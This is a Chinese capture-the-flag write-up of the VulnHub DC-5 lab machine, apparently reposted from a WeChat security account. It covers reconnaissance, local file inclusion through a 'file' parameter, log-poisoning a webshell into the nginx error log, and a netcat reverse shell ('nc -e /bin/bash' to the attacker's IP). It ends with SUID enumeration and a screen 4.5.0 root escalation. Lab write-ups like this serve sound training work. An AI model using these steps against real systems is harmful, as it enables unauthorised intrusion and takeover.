【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透
靶场搭建
从官网直接用迅雷下载就会快一点:https://www.vulnhub.com/entry/dc-5,314/ 用vm直接打开ova文件即可,要注意一下靶机和攻击机(kali)要在同一个局域网内哦!!!
信息收集
主机收集
arp-scan -l
靶场的ip为192.168.2.138
端口收集
nmap全端口扫描nmap -sS -P 1-65536 -v 192.168.2.138
开放的端口有80、111、43274
目录扫描
dirb
dirb http://192.168.2.138
虽然没看到敏感的目录,但是有时候dirb工具扫不出来,所以我们用御剑再扫一下
御剑
也可以用disreach
disreach
dirsearch -u http://192.168.2.138
指纹识别
发现nginx的版本是nginx 1.6.2
网站信息收集
whatweb -v http://192.168.2.138
没有发现什么有用的网址的信息
信息收集总结
ip地址:192.168.2.138开放的端口:80、111、43274目录:/contact.php/thankyou.php/faq.php/footer.php版本:nginx1.6.2
漏洞利用
端口的利用
80端口
开放了80端口,我们可以去访问它的网址,看看有没有什么信息
发现有很多功能区,到处逛逛看看有没有什么信息
目录利用
/contact.php
试一下看看有没有存在xss漏洞
<script>alert('xss漏洞')</script>
/thankyou.php
虽然没有存在xss漏洞,但是我们发现提交之后最下面的时间从2019变成2018,每提交一次就变,此时的url:/thankyou.php
/faq.php
fap.php反复刷新,发现下面的时间没有变化
/footer.php
发现footer.php是前面两个网站最下面的一个功能,反复刷新发现时间也是变的,说明在thankyyou.php页面上存在文件包含footer.php,当contact.php页面填入数据时提交到thankyou.php页面
文件包含
我们验证一下是否存在文件包含漏洞/thankyou.php?file=/etc/passwd
没有发现可以登录的,我们只能试试传入一句话木马连接得到shell这个思路啦
bp抓包
bp上传一句话木马
检验一下是否上传成功
看一下日志的信息,通过前面的网址信息收集,是nginx1.6.2版本的,所以它的日志会记录在下面的路径上?file=/var/log/nginx/error.log
) 在响应的日志信息中我们可以看到确实能看到木马,说明上传成功了。
蚁剑连接
打开终端查看一下当前用户的权限,发现只是普通的用户,很多文件的权限都是要root超级用户,所以我们正向提权行不通,还是一样,反弹shell提权
反弹shell
kali攻击机开启监听
我习惯用nc反弹shellnc -lvvp 7777
靶机反弹
nc -e /bin/bash 192.168.2.129 7777192.168.2.129是攻击机kali的ip
连接成功
进入交互式
只能看一些目录,进入home发现存在一个dc文件,但是没有权限看,是root或者dc用户才能查看
suid权限的文件
查看一下那些文件具有suid权限的文件find / -perm -u=s -type f 2>/dev/null
发现有两个不寻常得到文件,得到一个screen 4.5.0,查找一下和这个有关的漏洞,看看能不能利用一些脚本提权
寻找漏洞
发现有一个脚本和txt文件
txt文件
先下载到kali上,发现文件里面有screen提权的步骤,我们直接根据步骤提权
提权成功到root
脚本漏洞
我们先下载到kali上,再开启http服务上传到靶机上,看看能不能运行该脚本提权成功
上传成功! 执行脚本,发现一开始没有权限,所以执行不了该脚本,所以我们先给文件简单的授权,再运行该脚本
运行成功,成功得到root用户的权限,直接进入root目录找flag啦
成功得到flag!!
原文始发于微信公众号(Cauchy网安):【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论